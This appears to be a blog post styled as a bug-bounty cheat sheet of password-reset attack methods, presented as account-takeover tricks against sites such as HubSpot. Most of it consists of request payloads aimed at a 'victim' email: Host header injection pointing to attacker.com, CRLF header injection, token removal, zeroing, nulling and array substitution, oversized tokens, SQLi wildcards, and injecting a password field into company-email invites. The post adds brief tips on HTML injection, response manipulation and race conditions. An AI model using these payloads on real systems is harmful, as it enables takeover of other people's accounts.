Home front-page port 80-shoopyu Password Reset Vulnerabilities
Post
Cancel

front-page port 80-shoopyu Password Reset Vulnerabilities



th-364396762 (1)


Hey, hacking enthusiasts! Ready to uncover some mind-blowing tricks? Dive into these HubSpot Full Account Takeover methods and master the hackerโ€™s playbook!

๐Ÿ“ง Using Your Token on Victimsโ€™ Email

1
2
POST /reset
email=victim@gmail.com&token=$YOUR-TOKEN$

Imagine slipping into someoneโ€™s email fortress with a cleverly placed token. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

๐ŸŒ Host Header Injection

1
2
3
POST /reset
Host: attacker.com
email=victim@gmail.com`

Messing with the host header to sow confusion. Crafty, right?

๐ŸŽญ HTML Injection in Host Header

1
2
3
POST /reset
Host: attacker">.com
email=victim@gmail.com

Why settle for ordinary when you can inject style into your hacks? ๐Ÿ˜‰

๐Ÿ•ต๏ธ Leakage of Password Reset in Referer Header

Referrer: https://website.com/reset?token=1234

Spotting hidden treasures in the Referer Header - a classic move in the hackerโ€™s handbook.

๐ŸŽญ Using Companies Email

1
2
3
4
5
6
7
8
While inviting users into your account/organization, you can also try inviting company emails and add a 
new field "password": "example123". or "pass": "example123" in the request. you may end up resetting a user password

Company emails can be found on target's GitHub Repos members or you can check on http://hunter.io. some users
have a feature to set a password for invited emails, so here we can try adding a pass parameter.

If successful, we can use those credentials to login into the account, SSO integrations, support panels,
etc

Mixing business with pleasure by exploiting the power of company emails. ๐Ÿข๐Ÿ’ป

๐Ÿšช CRLF in URL

/resetPassword?0a%0dHost:atracker.tld

Breaking into the reset realm with CRLF magic. ๐Ÿช„

๐Ÿ“ฌ HTML Injection in Email

HTML injection in email via parameters, cookie, etc > inject image > leak the token

Crafting emails that are not just messages but gateways to breach security. ๐Ÿ’ป๐Ÿ”“

๐Ÿšฎ Remove Token

/reset?eamil=victims@gmail.com&token=

Playing hide and seek with tokens - remove, replace, and conquer. ๐Ÿ•ต๏ธโ€โ™€๏ธ๐ŸŽญ

๐Ÿ”„ Change it to 0000

/reset?eamil=victims@gmail.com&token=0000000000

Transforming tokens like a digital alchemist. โœจ

๐Ÿšซ Use Null Value

/reset?eamil=victims@gmail.com&token=Null/nil

Because sometimes, nothing is more powerful than Null. ๐Ÿง™โ€โ™‚๏ธ

๐ŸŽฒ Try an Array of Old Tokens

/reset?eamil=victims@gmail.com&token=[oldtoken1,oldtoken2]

Rolling the dice with a repertoire of old tokens. ๐ŸŽฒ

๐Ÿ•ต๏ธ SQLi Bypass

try sqli bypass and wildcard or, %, *

In the quest for knowledge, SQLi becomes the secret language. ๐Ÿคซ๐Ÿ“œ

๐Ÿ”„ Request Method / Content Type

change request method (get, put, post etc) and/or content type (xml<>json)

Mastering the art of disguise - because not all requests are created equal. ๐ŸŽญ

๐Ÿ”„ Response Manipulation

Replace bad response and replace with good one

Turning the tables by manipulating responses. Itโ€™s like playing chess with code. โ™Ÿ๏ธ

๐Ÿš€ Massive Token

/reset?eamil=victims@gmail.com&token=1000000 long string

Unleashing the power of the colossal token - because size does matter in the hacking world. ๐Ÿš€

๐Ÿ”— Crossdomain Token Usage

If a program has multiple domains using the same underlying reset mechanism...

Navigating through domains like a digital acrobat - because sometimes, tokens transcend boundaries. ๐ŸŒ

Final Notes ๐Ÿ“’

๐Ÿ” Leaking Reset Token in Response Body

๐Ÿ”„ Change 1 Char at the Begin/End to See if the Token is Evaluated

๐Ÿ“ฌ Use Unicode Char Jutsu to Spoof Email Address

โฑ๏ธ Look for Race Conditions

๐Ÿ”„ Try to Register the Same Mail with Different TLD (.eu, .net, etc)


Hope you enjoy this adventure into the world of bug bounty hunting! Happy hacking!

This post is licensed under CC BY 4.0 by the author.

front-page port 80-shoopyu TrueSecrets | Hack The Box | Forensics

img AgentSudo | Tryhackme | Walkthrough